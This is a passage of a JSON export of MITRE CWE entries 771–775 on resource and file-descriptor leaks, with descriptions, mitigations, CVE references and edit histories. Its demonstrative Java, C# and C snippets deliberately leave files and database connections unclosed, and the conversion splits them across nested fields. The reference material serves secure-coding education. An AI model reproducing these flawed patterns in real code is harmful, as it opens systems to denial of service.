Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"771":{"attr":{"@_ID":"771","@_Name":"Missing Reference to Active Allocated Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed.","Extended_Description":"This does not necessarily apply in languages or frameworks that automatically perform garbage collection, since the removal of all references may act as a signal that the resource is ready to be reclaimed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"772":{"attr":{"@_ID":"772","@_Name":"Missing Release of Resource after Effective Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.","Extended_Description":"When a resource is not released after use, it can allow attackers to cause a denial of service by causing the allocation of resources without triggering their release. Frequently-affected resources include memory, CPU, disk space, power or battery, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free resources in a function. If you allocate resources that you intend to free upon completion of the function, you must be sure to free the resources at all exit points for that function including error conditions."},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"Intro_Text":"The following code attempts to open a new connection to a database, process the results returned by the database, and close the allocated SqlConnection object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();","xhtml:br":["","","","","",""]}},"Body_Text":"The problem with the above code is that if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-772"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-772"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"469"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-772"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-772"}}]},"Notes":{"Note":[{"#text":"\\"Resource exhaustion\\" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"773":{"attr":{"@_ID":"773","@_Name":"Missing Reference to Active File Descriptor or Handle","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"771","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"774":{"attr":{"@_ID":"774","@_Name":"Allocation of File Descriptors or Handles Without Limits or Throttling","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File Descriptor Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When allocating resources without limits, an attacker could prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"775":{"attr":{"@_ID":"775","@_Name":"Missing Release of File Descriptor or Handle after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed.","Extended_Description":"When a file descriptor or handle is not released after use (typically by explicitly closing it), attackers can cause a denial of service by consuming all available file descriptors/handles, or otherwise preventing other system processes from obtaining their own file descriptors/handles.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;File Descriptor Leaks&#34;, Page 582"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content 